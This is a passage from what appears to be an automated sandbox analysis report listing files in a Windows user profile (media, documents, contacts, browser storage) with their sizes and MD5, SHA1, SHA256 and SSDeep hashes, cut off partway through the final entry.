SHA256: 37d6ad0739ab58d4a36b80871dc0bac53232974f290e855a33637cca41eebfd5
SSDeep: 3072:p2czrHQFu3w37ZbCUnPbo38TNX9AJ5yxV:p2wrHQFoC74UPFTNNAJAn
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\NSMy5XFpc9v55E4.png 16.98 KB MD5: fde2bc2061a8a2fbae5e9fda67033e8c
SHA1: 6e1a55efe6fc23f35b11a000c2622f0c25171365
SHA256: 691f615642f394ba0839eb22c2db4158af5e48b3dfcf4bd2bd61eab35172f125
SSDeep: 384:cezGtQtNwBrEu9mnGaaenCfzAxBW8uqlCp5jScxFIP7:tGt4+1HWC2wqlCp5jSfP7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\sMjYpjKhyZpf8TNaMG.gif 60.47 KB MD5: d103aaf38ee1e28abb1dd2d9bab77785
SHA1: f8d7aeeef0f7c861068a104ce504d0f1a461f790
SHA256: 0077be53bcc8df357ffac38c5e468564e3311b78ad5b7b1a2f45526522a26ac5
SSDeep: 1536:CqfXILmd9FDq4jwLPks5dFgLkgwbcCw6rWXUsf+9:CUXIQ9Fq4jSbFqkvYBu9
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\fXLlrMkF3y385T7R_VK\V6CUx4Z.png 46.98 KB MD5: 4cea05ee38e55a92f5b0914a74a29f09
SHA1: e50445a83f7862f6cf3baea3d53da98d4284c4ef
SHA256: 6194bf07f1d9b738e812f06434e6c463b3f70630a9974ca9a96dc39bd0c382ef
SSDeep: 768:N5e6yzTm7g5jzk6/flU+l1KK0SYJVD/RI3u6mHvp1MLgbpmpYV/QsLHZwWb8EKF1:NImQk6XYJp/Rv6mBGk0iV/FLHmgMFVX
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\lZ73i.avi 81.53 KB MD5: ae14424c1dee421114e51a726d66fff0
SHA1: 445625cbbea107b0f81216ce6c33922d31950c37
SHA256: 425b10bf50b550e16f39aed2153a3c138e4fefda9aedbbb43893c5517c92b859
SSDeep: 1536:TCcyaBCG/IuPlWXePLoT2Y35+0J5A/CbhIDdTE8vYDjVFCkptikvSo:GUR/IIWRv+0LOkhIdTE8vY3Vtik5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\NDd8nvPiASazxx_Qnd.mp4 96.84 KB MD5: 323d91435a5e0c7ec5ef6b982302da2f
SHA1: 7fde41ff1a3f6bbb5b334f4db231f72749422773
SHA256: 16a1c0b1939b85d54680e6bc7bc05d9023540b2814f953e76d4ebf084ae48b94
SSDeep: 3072:oqnGHfi42thowIppUsCtuuNIK/LJNrOTglbjFga6u:o7qZ/owITUsCtfIALPrbRia6u
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\QV66E7hBIev3ByZZaaQi.flv 1.20 KB MD5: 6139f25857aee763e4a6930bfc56f0bb
SHA1: bd012c5848efadc54616db8d9173d673888c7e1b
SHA256: 4fdd1bf85b56b56a10737d9487608c5c09afb62b902b886b4b6722f45ab2f6c2
SSDeep: 24:8f85Z+mchRiCu97ay2igZ7zoAXHg6Qto8ruUJ//bdg2BWUFbD:Dum03u9O9i6fw5uUBDdg2rVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\T0lSyaUX_nTdUnU89-7l.avi 34.45 KB MD5: 24b55abdcd3a4fb7c1be6d78f6cfa3b2
SHA1: c17b12d207a0c0655fb1386461428311def898b6
SHA256: e3b1a250ee2e61ac606eb0f39706ed39a6f814419631e4c056f539395805b877
SSDeep: 768:w72vYUW7rAYb9mJxWAbGZPHt6eYh01ScOLrIASy:lYUW7rAE9vAbGZl1Ym1WLrIASy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\M9S6OcF7aYbMU.swf 23.42 KB MD5: 1a80d06ee059f2a4396a60b5c1473d23
SHA1: a29eecac96039902ee8fff261be8285bd7115c81
SHA256: 9efe574f36b224e5ad84a18523f90c217c96c325c808d1254b480ac854b0d094
SSDeep: 384:40R3sPTHnjQcDPmmD5FxMC4ktT/nqDJmhywBs/YeE0XoVRt03bj:M7DTDPfpMDuvcmhyWs/tEMoVA3bj
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi 53.83 KB MD5: 667c914aed82cd97428d798c16d8d119
SHA1: 3ec304b3ebe26e82fbbfc42b88731feb43f4897f
SHA256: b087b64d01612238442fa1e0a5dc21a9e29836311868a1d563043f5d8ee62dfd
SSDeep: 1536:IthMcCHw9n+J96Os1n4QL+SP0x7cN4usrVcGpprgy:7w9n+DTSsx7cujB/0y
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi 38.73 KB MD5: 2b86330229c3369abaa1a0f94a3aba3a
SHA1: b1e3272ce7b649fbefdab0c6666568b769fcf744
SHA256: 4232aef697744fc6ef0ad913436e8e9c3c34612e96e8466941a4389335016d0a
SSDeep: 768:CbYm4eYOM/YvCazEB1BE+j/UilDMvB9qrFVT9f8PTEiRk1:Ed4eySEBEWA9qrFVT98Trm1
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi 181.08 KB MD5: 19a1c7dddad67c09a6d11fdcd2f279e8
SHA1: b01474444b9f0bbef9831d40617f508d3653944b
SHA256: 3b99eaa45ae6b7471361ee350ac06dc9c18e068f25922dd649ccf6ab1578e675
SSDeep: 3072:kD3Ir3nLAsHEC7XU+0AxdiuUHd4IxjZioeWqXqGP:kO3nQs7/iuUHdtxPzqX3P
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv 66.20 KB MD5: bd76acb4c4508d22d90bca9afdb1167d
SHA1: e4a1c44bc02732db38fb571cc8fe00cf4b1e082e
SHA256: 044cd24295f2f043d52ccc013d62cd8d65a9a410cf2fbc552ea0dd821962d064
SSDeep: 1536:4pkP8QWayDDBi+aEL5YW39WBWnowHes9XNvGyR7r4aR9OYvDOziZ/C:mkPZmHBraEL5YW39tnowHesZ59OY7OWg
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4 38.64 KB MD5: 95a2eb07b05051b1c97f0c66aab913fe
SHA1: fc2dcf51f0b54de8d1b820957b2f22fd0ce7b418
SHA256: 59e47c6b67f90e0749d2db282948968fa38c524d339dd5523508c9fdee9ac4d3
SSDeep: 768:+XSrGrWX9w4UJeY+MnsZOXhL+j3XmDJfWeQtPu7dltCGB9:3rGrW7U0d32DQztW7dltCI
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv 55.08 KB MD5: 7ea2d90c438cd16a4272d3f8971a8294
SHA1: b3f415b0cb6d57595633f0ce7d10511c28623805
SHA256: 3181bcbd0f3451afff0e3728a377ba65f44e7edfd99e33e19101f82adceb503f
SSDeep: 1536:QI84kwxc6o5ws0TQQsrURGlan8LMly0BrJZJ:QIguses0TWrU8angM00BDJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv 14.05 KB MD5: 7b4f70d472fe1773cc9ebbd68fa7b920
SHA1: 2b413d764779a6b9ffced45e4edc755c3a51dcd1
SHA256: 4b71dd54e441f302418fe30ac8714f2bf536920a3711e07faee5cfd36791d5d8
SSDeep: 384:O9IIDz0UXO40rzzjLJsT0JS4BVpYpeYQ2SxqFAN1fK:AZcTJDI6QFAN1fK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv 26.67 KB MD5: 6d35e444112fc476ceaddb26db9ce62b
SHA1: 195a07648886a771ee421b601e248b5eb3a837fc
SHA256: 45ce6fa4dcbcfa94303215b3a61d426e150ab70b248dc9b5858415815f050bdf
SSDeep: 384:5y4IfTmY5em2ap0BN4hGuu3rN6mq4ha2JuWtFyEMFzXIph3jZ6VQN:w4CT5emgN4gjrN6mm0kE8crZ62N
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4 62.88 KB MD5: 0dac0c8927bc8b34b32900295b3462a0
SHA1: 84c5bcee2d2f96606160a4a5752fc4df81147ea1
SHA256: 0ac4717b95599a818c47c352591f7bd90e8fb4a5bc07e7a78d09961fbd61c47a
SSDeep: 1536:/Dqjf+dmYPREAgMNEu2xZYOOjH+ZNGAnX7Re:/DkMmH1PxZJZNGGXE
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml 91 bytes MD5: 444000394facc34bbaa1a5ac11a3fcea
SHA1: ea4583d8355bf44fbb8cd2743b75020dc149e5e5
SHA256: c78e87667b24f89aad054189658d2c7db55622652bc1220c98d40230ea62873d
SSDeep: 3:D68PifPDNWRUqAksncIFiRHIgHaRT:enHBWUFcii96Z
False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml 914 bytes MD5: 48097f2721fc572c525792c44b0ac368
SHA1: 4b1e1e4ba61ddfb06274b542252e48232fe195e7
SHA256: 8f8fa2abb3cff86dbdb142ebfe7c9f8bd9ad2753ff435e47abb71a45e03e50cd
SSDeep: 24:y8XbEcmtT0AeAu1Q8FkFvQ9VNGntDEvorgjNI2coyEWUpVBBWUFbD:LEcgo9Au28FPotgvw+RcbaVBrVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi 40.95 KB MD5: 61fc58d224e8ffac42e3c5fd7bbc824b
SHA1: b752d8e2f63de0ed1b09e525a3c7685f9b9d054a
SHA256: cbeb8c19aa43f3c8e890eac1f0e942de63f6e06c4af6bce8433468c199f6c356
SSDeep: 768:9MfUklxpREfaJFwkxmVWnbZNiRSaDtTfXCL3v37wuDahWNOmlY2jA99xm:OPvEfa7wBV/RSapf0fPDROmW9xm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi 13.32 KB MD5: 96788c23532863dbdd9230455f93a36e
SHA1: dc6b06889c95fc2e1fcc4ad7119ffd46b34563b8
SHA256: f97fbaeda2d1b8f1408ebcf415e97c677a1118ba81a1e7076a9cabcc67a72d84
SSDeep: 384:jihlhMLUMFcDAzvS/IdJxMixpqzonofv1JVr:j8lhMLUgvSADLaUYv3Vr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4 87.09 KB MD5: 12bbf06134224a228cc43e5b1db52d6a
SHA1: e0d35bbbb1f1c6fb67dca1e2b12d921f5de3b620
SHA256: 4a605137db0f3504cfb9d5606d3888569a4547cb77def577a61cc2fe41c220fd
SSDeep: 1536:DeVNy3ODnsb2kWZEqSbeojuDrfG+//ohYiZaiWnGwo4Ivy+83QQH9M/rL9:DeKODnsbTEsiojuDD7/wC0av9oZvy7PW
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact 1.23 KB MD5: a4f2240312dffe64969d33bab9911ade
SHA1: d22cd2c755527ffb06b5d6c7d53b9aa7616d497c
SHA256: e50f2f8cc674851b3762c16029a1405d565947b99eeebee1166e1377fbe0f22b
SSDeep: 24:o05c4cK4FXOKOpTxZK5FH5M2UajIXEEO2ZUtwfFz3fVqMg57DbQ/BWUFbD:o05c4yFXOpLK5PMziIUEO2ZUOlshdDbM
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact 1.22 KB MD5: 638e00c8b5989e0fe39659f4b39d740f
SHA1: 209231a38b2599b05e637c6622c1dbc6d661a1e9
SHA256: 84cf0e4d40b23cce1e6159e8e8023df48443cf73152c441aeb76852d7a824aa7
SSDeep: 24:o05c4cK4FXOKOpTxZKGM6kFUajIYlW2H7EeLd8dC9L0isjA3neBycABWUFbD:o05c4yFXOpLKtuiIYA2H4c/9L0i53eyH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi 63.53 KB MD5: 8ce2554eae66b3d8c0aaa48518a48538
SHA1: 54e961b248228cadfe217469553de077cbc41e8e
SHA256: c858c42bde1c020234d4f9bb9615ca71ac7e7ded312b1903be7450c8ea87ae39
SSDeep: 1536:eZQghe0n1xYL0jbiKLUW4xgEC8o8eKAgmHf2lBbV1s2VYKV:eZ5hx1u2iKz4Q8o89AHfsD1soV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg 79.22 KB MD5: afad99c97e39a62f36ae9aa4952f3633
SHA1: 17f7e5122cfd8a5446acab1f3b4f4eef69d9132e
SHA256: 3592f2f609d022689b7de48b9a814cbfe6683731d035a568f05574730d73f37d
SSDeep: 1536:oZA/Nxy9kzYosyYh5s5X/GYRLp9NbuZLXNqnvUBuPi:oW/Nxy9OppYsNNPbuZpy8kPi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 51.10 KB MD5: 31cf6ce5b4d0c5d5c40a7fc1f6a30219
SHA1: f8e7058e687a58b1dee7dec320e6fb7de79e0d20
SHA256: 406cad1ac8f1d5b6dcc2e56254bf80513ec28732b5df5dbc1c7613a4f2a113e9
SSDeep: 768:wCxYhmXGTNL4xeavYFMzz1tFvjWq9JU7neCNza7qOz6IIgSCciiql4uWsr+wCda5:w9hdTNDavYWzEy69Nz6uIIbreJFCAXr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 43.15 KB MD5: f902ab0896d787e05820ae05dbdfcb56
SHA1: cb09a7fa52c4b211a10449c2d3226eee0d0a4213
SHA256: 95765a5a77c7d8555b607f0fc9b8bcd0accf8dd92d54bc5317db196d213b04e8
SSDeep: 768:NkH0/CLAm/yDMUEdl+jkp6/fsZRS1r2DkwIDnYWDSLhPh74ccVkzBp5I8dJYakJ:T81rPdKZ/0Zc14MDnYWIhPh7NKArRJYH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv 81.85 KB MD5: 5ac27eb584aff7fe3db500bb528ca020
SHA1: 435a277809fe444481d9455916537096fd7e120c
SHA256: be992c55f474086d876b22769add5358e09a1f498624971c9cc1b81595c09904
SSDeep: 1536:qojFjUbBnV4xoX5W6ZDt+LbFajOklcnfD78YVkiBHruYpIKkQCF3npUcIpZ:qYjSBJ5W6D8vsjIfvoiBLuEi6cIH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a 67.50 KB MD5: f03f35c98194f1ecb9591fc93173b996
SHA1: 15fcd573cfc3638aa14c18fa88fa36b759a5bcca
SHA256: 55790fb0323c283ea44c94d1d8a2c72b14c8ae7105206268b6038f2646d08798
SSDeep: 1536:U6SxGaUXPOSK8erqBgw5cxIDBggQYC/hLDRnhum8WYMacJrgX71KKJ:SED/ePw8IDByYC/hLTuN7cJMX7tJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls 88.31 KB MD5: 98f23245af09f84a41a90c964b8fef9d
SHA1: 099db1f27fb89a06dcd909ae47fb7fadb86b0557
SHA256: f43b8728f0d57a5d78fef3967305cce728e985dee4d1ef3dce0af55b52cda79f
SSDeep: 1536:qdCoZcGpZClZE35BRBiHXOh676VGbpXXy9mdPmdtdiBw8QN1pih0MkM4O6TEjjhi:ifZcGDClm35BRc3Oh6ZnYcmIK86pttVd
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx 39.59 KB MD5: f9317fcb24ce9203b96b1d9c9156f7a9
SHA1: a3dd5bc48b47ad74024bcd1762b22ea4e0f1ba06
SHA256: e887613fbacfbd770c5f08d25b9ff063ef8e2f71c5d02dbb8db64e96db5496ce
SSDeep: 768:AfKVwb0lkMBUhD0+RJpKLcE744j8lsXCajgB6/H8pGmiLDg7NAWIysfN:AiWGBUhQ+JqfzgiXv8ScpGTDjWIJN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx 93.59 KB MD5: 50c5cf41eb883d1f1de922b1a17e45a8
SHA1: 443378e45da67e003d5813e9152aad21b88c3e4e
SHA256: 036ad5c817ab8207c429118387dcf2a0a7c3c991129fd7a30ad9607d1f7f4b5b
SSDeep: 1536:VsPX70+4qBfLFxtYjklJN57/Qp+OF6EHDwwGAvGqch5EfjIu5+ik4:Vsf70+lfLFvYj0HSpbVwXr5Tu5+p4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx 60.73 KB MD5: bbaff1270738b877a1da94cd0b22ad30
SHA1: 17389f6c269f14ff0b6ac0e75681b667bd42d31d
SHA256: ec2807dab81ced4c76f9514c7dc34336ed8350fbe36bc2241cb6f025dbd6582c
SSDeep: 1536:uzvF2ts8ZtgjU9+rlj3HTkOTXWpLx/b8I5u066:uz+s8zZsnkOzILxT8su0r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx 13.88 KB MD5: 6984761224351b25386b89ce23ac12f3
SHA1: f59810503b0f78d1e95095aa19ca10bd80ea3dd5
SHA256: 30f25b17b125e7974560406454d7810ac465108131cc733514c0a3c64bd81fb2
SSDeep: 384:HZTu5/WafBnmSwfOLuJZMqNrlAKc1k/T7E:HZTu5e0KOUuqNrqTk/vE
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx 53.57 KB MD5: bf8ebbd080872049da770f1d4b79a50a
SHA1: c704b8ed9cc91851665ad314151dba2d89ffd42b
SHA256: cf83281cbb48ff35e468edb28ebe4221c8c7e60dbcc95236d40de5fbf18cbf93
SSDeep: 1536:IX1fuhytQ8gRxjmTzUpYgXQFm+oVoFzY1UP:61fuh9vf6F5eAYeP
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots 95.11 KB MD5: da0c92ebd7427870da8fa2d0092a1420
SHA1: e7453e38d4584936ef8efb9398dae1117ebb2f5c
SHA256: 7b29962371296423dd69eb5cb6df9639cbab23ec31cbe8e4d2816a6a1ef208a2
SSDeep: 1536:VG2vwEhjpxmPcxQQInyoqkwvrJQaxkHq/Q+KUU0Gt6fYLLDJOMZPQ5gqEiW1D1Ng:Y2vwIjpIn9qJzJQaiHXeYeY7HZP2XW1M
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx 24.62 KB MD5: 7bc740bc67e016636035c3be69d86e72
SHA1: dfeae244d43e6a69dec393b54169dcd9837f99e5
SHA256: db17dc75f3701612fb5cb6d126c7100a8bd56212c91612282298ed0cc2b66199
SSDeep: 768:He2fqBACB8wXf3a6ubYBAPoQx+mcjEPci:+sW/Xfq7bVPvcoB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx 24.37 KB MD5: 17a02743c5a3b4930028d1136276b18d
SHA1: 69e4786641caf3ed2ee5d9fe0a282f2fce0388ee
SHA256: 3eaf9f537fc78298d0aeaab21ef79c4c7173c4aa71a8b7c2fa1e09000d7cc87a
SSDeep: 384:zE/bDNJe9XRepSei0oq4VH4YZOyBeTsjf7PeoJclblSx4TV3D0vJQm4yUZbRTdeF:A/lJESUd5DuWORUx4JeJJeHJeUkb
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx 26.83 KB MD5: 310328d2eb57aa4b79dd94e4a87f34b4
SHA1: c1fbd5015f0aaf5cdc550e26c0fed53952f50339
SHA256: 63831daf7c40e6295aba324e3be9c949d387960718b3e47c6742dd26b7879988
SSDeep: 768:P06aWvIzUBDOIQgxT6O8JtxZKbFA6NnQ05Vcc+p:c6dIQ0XG+/KC6G0XB+p
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx 40.78 KB MD5: 7fad12967f2b27c7bc121b40e22ae8a5
SHA1: 5eeff5b2b9b91d9d6112394053af54ee725166ae
SHA256: ff1222504b57744d3372a4875a74e6235d6640475aa8e49b16feaa63eb4b54b5
SSDeep: 768:aJZcYj5aSOCnW8V1DzSIS4DGfk3ycFb0c4FvQC02+druvRHlo82TWscbL:QZljBOp8bDzZSwGAmfam+5yRHAis+L
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 13.27 KB MD5: 6935172483f346e39b65ef3625418f91
SHA1: 7868c780a884c511adcfe0d4fa908032f3fc2e55
SHA256: 9e7c1756812ad1b5fca8df89299828e962960d339849f684a3368b82b5ddbbb7
SSDeep: 384:gROrwLFSi8zoq4TaCd5pCjsnpfVwC9+Qz/o0Ng9c:gROr+FUcTaCAjQVM0+q
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav 48.42 KB MD5: 469e2bbaec4795a42e54ed73163fafcc
SHA1: e105cb1459ab48f3b2c8b2678dda3203278f479d
SHA256: 4b80ea7989901de8ad3990a79db08ab6b87571fb0340ae44a8724f68aa960842
SSDeep: 1536:hAFOSOHZ5meiFWMoZSiWqfgjKmQbKuvMVk6Xr1GN:hA0n5maMhi54jKm6fii
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav 7.61 KB MD5: 28f9d1b10d4052cce249430338091f0d
SHA1: d0901fe3477d0e814649ad39401c1121b0802221
SHA256: 972209a9fa7d6e421bbc5c5b78b8e05c3c7bfbeb4daff7687fb7ef40826513ba
SSDeep: 192:Wa3ecpfilDsQQuZFwTxI+tmEvTEQUPrZQgdAhGGneLroni:j7JuZFSI2rTEjjZQgdAYdoi
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a 71.97 KB MD5: d236fedf89d7326cc447627894f2866e
SHA1: 48a19811e75673367cd4be35270f7ed638be9db9
SHA256: 7cbe3b1c48f9b158a50a7c6aa64ebc1e59e00d143e9bd813cca83d264b67df6f
SSDeep: 1536:StFeavnbrlSu+eHcyPbG/D4AutP5zReFHk0gS2Rby64b9S+bRI:uFeenQu+eHcyzsvutRzR6Hk0J2dy6U9m
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 78.42 KB MD5: 4745f8f1eac99a42cb569371e20c0260
SHA1: be9fa1ad8aac997e4d9678a5389d5a359cad51c7
SHA256: 619124114a4ff5bbdd54ae6476157120a7543fd9e0a578cf6d9c612692781416
SSDeep: 1536:ip6p/pO/vNF11ZkT8++7F/nyyGHRCjsxK1aNb1mCAVlKp2:ipcO/v311ZkT8TF/nZAxbBAVl
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 59.98 KB MD5: 67b8a6de6a3b571f2565de2f627e811a
SHA1: 8c08763cd9454fa4c490906ded070576d55301e8
SHA256: 0fdd449755fee89fd8034e30b26ee541d9dc10807725436df0b687926e117c29
SSDeep: 1536:9mRv69ZQEKUIiTETnl18ka6SqSfwkyrl4DCPbN6jOl:coQZOEk6SqkyrKC7l
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a 60.31 KB MD5: 488b336d1400aea90262571d5c42b92e
SHA1: 74ca58901a65f8ea321f3a9e53d09752c0bbc531
SHA256: 2777049f481b44a9742cf496dcb5ba2e364da98e6edd006e623c34598aeafd1c
SSDeep: 1536:qbmAie4+07x8eqwTt5WIMMcRam6SVcdeCZfuhoziMMF5D7bUn:rlp5F8Ap5WxMcg6cdBOF5D7gn
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav 32.18 KB MD5: f015cf4294c06c81124a1c4bcb8e755f
SHA1: 3cfc58c5b17b823e8c2e2c46f2f9868d92c12860
SHA256: 7c3d5a6b8c7e310e56abbe004696e0e7b2b2757c683cb4b112d5d0c62291a66f
SSDeep: 768:+3lihIN60yowNddfpZoIczaW8ZHNK+UE/6QvtqWKmTXPfCI5P:uYIN6TJDfHoIczaW8ZtK+/6+emTH1P
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav 41.86 KB MD5: 0e92c096ddf9efcdd4ade529bcfd28b6
SHA1: d22fb9aed26ad1f06b14d63b5fe27bd790532a4f
SHA256: 41d59b9687eabbdc5f7528e1b2b96e87ca34d2885916cd227e374e5969e38b05
SSDeep: 768:Si/1SA2iq3Y5XH5AVCqB2YbsJ5qfoqusEXYx+PDHhJLLJ4URlpvcZ:J/ei2Yh2CqB2gm5qfgXa+1lLOURHcZ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 77.70 KB MD5: 3f4b8544b5c18a5fd102849b1b73e3dc
SHA1: dc7c6ba776f164cd6d79b6ba362b04978f357bae
SHA256: 1e610c7cc21efba0a74b9e2b6fc34b800dfa61d4a6cf005619e22c4f1339df50
SSDeep: 1536:ILzZSpN8GoIZVgGZFzc32RwfuQJfAnuzNJBj3qAOxlhdyXv1HIhh:IvZJGocXZSJJLBDqAcdyX9ohh
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a 36.19 KB MD5: aff9c8e4ed26d6ef29bb3d5fcbf7e609
SHA1: 0ccc4a1816fa93a97f7dfdf4a3733bda1c6c2dae
SHA256: eb6d814e5a1f462523f03e8807cafc1215cc3cbbe89122ae50d4822bf348ef07
SSDeep: 768:/sgkgeCQQFmlzBYwT3EGY2G8A3zsLyQYu2ZR1UHq+4gzDGWU6p55s:dVQQcnxrVEza2qK8zKn6p55s
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a 44.00 KB MD5: c54fcf8049a8db5eb8332dfdd24b17b1
SHA1: 219736a514943b7996674272ce037d30555a5866
SHA256: 9a8c831a4b9aa75f86605c66eae951dd3833030168272fbb128587cd2faae664
SSDeep: 768:zK1lj2mNPPC/IGgKzaaTSW5gvQdxl2DphQp5mR9BqbyL/wb6Lkz:zK13P1G/7j2Qdx0kt6Lkz
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav 46.05 KB MD5: c36c8333b34ae52d3f1cd6eacf4390d6
SHA1: cc1e1a0e17fd34d5dbd1926049031c4bf6973396
SHA256: 6185c2b1557b6d8303eced431398bcb84773812721b2627748fe4b15697c3fe6
SSDeep: 768:FejjZqjtOlv+Cux4CQY1RalxVmFmST3r60euQ6k6i1pZQmvhlhkAu2WGKcZ7eb:U6tOlv+b44ejVmxT3r6xuQz6AVvhvkAy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv 88.71 KB MD5: 46f4e9b486e79c9aa57c47551cdd9504
SHA1: 3b8c038fff34f118348b3cb1bc54d0d1e69c4501
SHA256: cd7cd9ca2231c85d61ecb94ea7d7afa9da7a46b813561d8fe1c5d125811cd7c8
SSDeep: 1536:jK3PHg5lEci/WS6qt5o0fppLKfvOBhu1qfqp8eMeTMcBfV0ezPImmRUf5rxc:jK3PgnEcibPxppLG8I4qHlfVzImmS5rm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a 62.39 KB MD5: e63a70e8d7d3dd0601b381680544a169
SHA1: b8ad799a33cd29a1cf2f84935560a968372bea92
SHA256: f5db28b1c74b29ec3efa6c2d6b52ddf520cd92508ab6ac24cbdbc0ec07b198d7
SSDeep: 1536:EAyS9xVr3GnL5iYj0K0GMZXPjhiQZrM6EPCk:EAyS9xVDsbg0MZXPjhiewjD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 42.46 KB MD5: 9a7e9ddcd341f20b8688826750262f3a
SHA1: 47b024f494ec57868f4d3b7dfdabd54e1ed0f3ae
